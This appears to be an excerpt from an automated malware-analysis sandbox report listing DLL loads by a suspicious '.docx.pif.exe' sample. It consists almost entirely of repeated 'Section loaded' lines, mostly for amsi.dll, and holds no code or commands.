Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: winhttpcom.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
